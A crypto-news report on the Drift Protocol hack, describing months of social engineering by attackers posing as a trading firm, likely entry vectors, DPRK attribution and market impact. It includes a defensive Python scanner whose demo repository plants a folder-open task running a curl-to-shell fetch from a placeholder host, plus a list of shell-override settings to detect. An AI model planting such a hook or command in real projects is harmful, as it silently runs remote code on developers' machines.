Drift Protocol hack: fake quant firm drains $285M
The Drift Protocol hack played out over roughly six months, with the attackers posing as a quantitative trading firm rather than stealing keys outright. Starting in fall 2025, the group built trust through in-person meetings in several countries and extended onboarding discussions.
They created a Telegram channel on day one. By December 2025 the attackers had onboarded an Ecosystem Vault and deposited over $1 million of their own capital. By February 2026 contributors believed the relationship was legitimate.
On April 1, 2026, according to Drift, the attackers' access turned into active exploitation. The Telegram chats vanished, the malicious software disappeared from the affected endpoints, and about $285 million was drained from a protocol that had already been compromised.
Drift lists three likely entry vectors: (1) a cloned repository for a "vault frontend"; (2) persuading a contributor to install a TestFlight app marketed as a wallet product; and (3) exploitation of a known VSCode/Cursor vulnerability (Dec 2025 to Feb 2026) that could silently run arbitrary code when a user opened files or folders. Drift presents these as likely vectors rather than a confirmed chain, so which one (or which combination) actually delivered the access is still open.
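The first and third vectors share one lesson for anyone who opens a repository sent by a counterparty: an editor can execute repository-controlled configuration before a single line of code is read. The check below is an added example and is not Drift's, Mandiant's, or the page's own tooling. It does not detect the unnamed VSCode/Cursor vulnerability the article refers to; it scans for the documented VS Code features a hostile "vault frontend" repository could abuse in the same way, namely `.vscode/tasks.json` tasks with `runOn: "folderOpen"` and workspace `settings.json` keys that replace the terminal shell or interpreter. The sample repository it builds in a temp directory is constructed for the demo and is not the attackers' repository.

```python
"""Pre-open scan of a cloned repository for editor configuration that runs
code on folder open.

Added example, not project code. It checks two documented VS Code
mechanisms (folderOpen tasks and workspace terminal/interpreter overrides),
not the specific editor vulnerability from the Drift write-up.
"""
import json
import re
import tempfile
from pathlib import Path

# Workspace settings that change what binary the editor launches. A repo
# that ships these is asking the editor to run attacker-chosen programs.
SUSPICIOUS_SETTING_PREFIXES = (
    "terminal.integrated.profiles.",
    "terminal.integrated.defaultProfile.",
    "terminal.integrated.automationProfile.",
    "terminal.integrated.env.",
    "terminal.integrated.shell.",
    "python.defaultInterpreterPath",
    "git.path",
)


def _load_jsonc(path: Path):
    """Parse a VS Code config file, tolerating // line comments and
    trailing commas (the JSONC dialect VS Code accepts)."""
    text = path.read_text(encoding="utf-8", errors="replace")
    text = "\n".join(l for l in text.splitlines() if not l.strip().startswith("//"))
    text = re.sub(r",\s*([}\]])", r"\1", text)
    return json.loads(text)


def scan_repo(repo: Path) -> list:
    """Return human-readable findings for config that would execute on open.
    An empty list means no folderOpen task or shell override was found."""
    findings = []
    tasks = repo / ".vscode" / "tasks.json"
    if tasks.is_file():
        try:
            data = _load_jsonc(tasks)
        except ValueError as exc:
            findings.append(f"{tasks}: unparseable tasks.json ({exc})")
            data = {}
        for task in data.get("tasks", []):
            run_on = (task.get("runOptions") or {}).get("runOn")
            if run_on == "folderOpen":
                findings.append(
                    f"{tasks}: task {task.get('label')!r} runs on folder open: "
                    f"{task.get('command', '')}"
                )
    settings = repo / ".vscode" / "settings.json"
    if settings.is_file():
        try:
            data = _load_jsonc(settings)
        except ValueError as exc:
            findings.append(f"{settings}: unparseable settings.json ({exc})")
            data = {}
        for key, value in data.items():
            if key.startswith(SUSPICIOUS_SETTING_PREFIXES):
                findings.append(f"{settings}: workspace overrides {key} = {value!r}")
    return findings


def build_demo_repo(hooked: bool) -> Path:
    """Constructed sample repository in a temp dir (not the real one).
    With hooked=True it carries one folderOpen task and two shell overrides."""
    root = Path(tempfile.mkdtemp(prefix="vault-frontend-"))
    (root / "src").mkdir()
    (root / "src" / "index.ts").write_text("export const app = 'vault frontend';\n")
    if hooked:
        vscode = root / ".vscode"
        vscode.mkdir()
        (vscode / "tasks.json").write_text(json.dumps({
            "version": "2.0.0",
            "tasks": [{
                "label": "install deps",
                "type": "shell",
                # hypothetical payload URL, constructed for the demo
                "command": "curl -s https://example.invalid/setup.sh | sh",
                "runOptions": {"runOn": "folderOpen"},
            }],
        }))
        (vscode / "settings.json").write_text(
            '{\n  // looks harmless\n'
            '  "terminal.integrated.defaultProfile.linux": "vault",\n'
            '  "terminal.integrated.profiles.linux": '
            '{"vault": {"path": "./node_modules/.bin/sh"}},\n}\n'
        )
    return root


if __name__ == "__main__":
    for name, repo in (("clean", build_demo_repo(False)), ("hooked", build_demo_repo(True))):
        print(f"[{name}] {repo}")
        for line in scan_repo(repo) or ["  no folder-open hooks found"]:
            print("  " + line)
```

Run it against a real clone before opening the folder in an editor; a non-empty result is a reason to review the repository in a throwaway VM rather than on a contributor laptop that holds signing keys. The scan is deliberately narrow: it will not catch a malicious dependency, a post-install script, or an editor extension recommendation, and Workspace Trust settings in the editor still matter independently of what this check reports.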
Attribution points, with medium-high confidence, to DPRK state-affiliated actors tracked as UNC4736/AppleJeus/Citrine Sleet, the cluster linked to the October 2024 Radiant Capital attack. Formal Mandiant attribution and device forensics are still in progress.
Response: Drift froze the remaining protocol functions, removed the compromised wallets from the multisig, and flagged the attacker wallets with exchanges and bridge operators. Drift urges teams that may have been targeted to contact SEAL911. For traders, the Drift Protocol hack reinforces smart-contract and "trust-layer" security risk across DeFi vaults and could weigh on sentiment around DRIFT in the short term.
Bearish
This news is bearish for DRIFT because the Drift Protocol hack involved a months-long trust-layer compromise that produced a large loss of $285M. In the short term, traders typically react by de-risking DeFi vault exposure, widening perceived smart-contract and operational risk premiums, and selling the affected protocol's token. In the long term, even with the mitigations in place (freezing functions, removing multisig members, exchange/bridge flagging), uncertainty about the exact time of compromise and the details of the social-engineering workflow could keep confidence in ecosystem vault onboarding processes low. Compared with a purely technical exploit, this months-long infiltration pattern keeps risk aversion high across similar projects.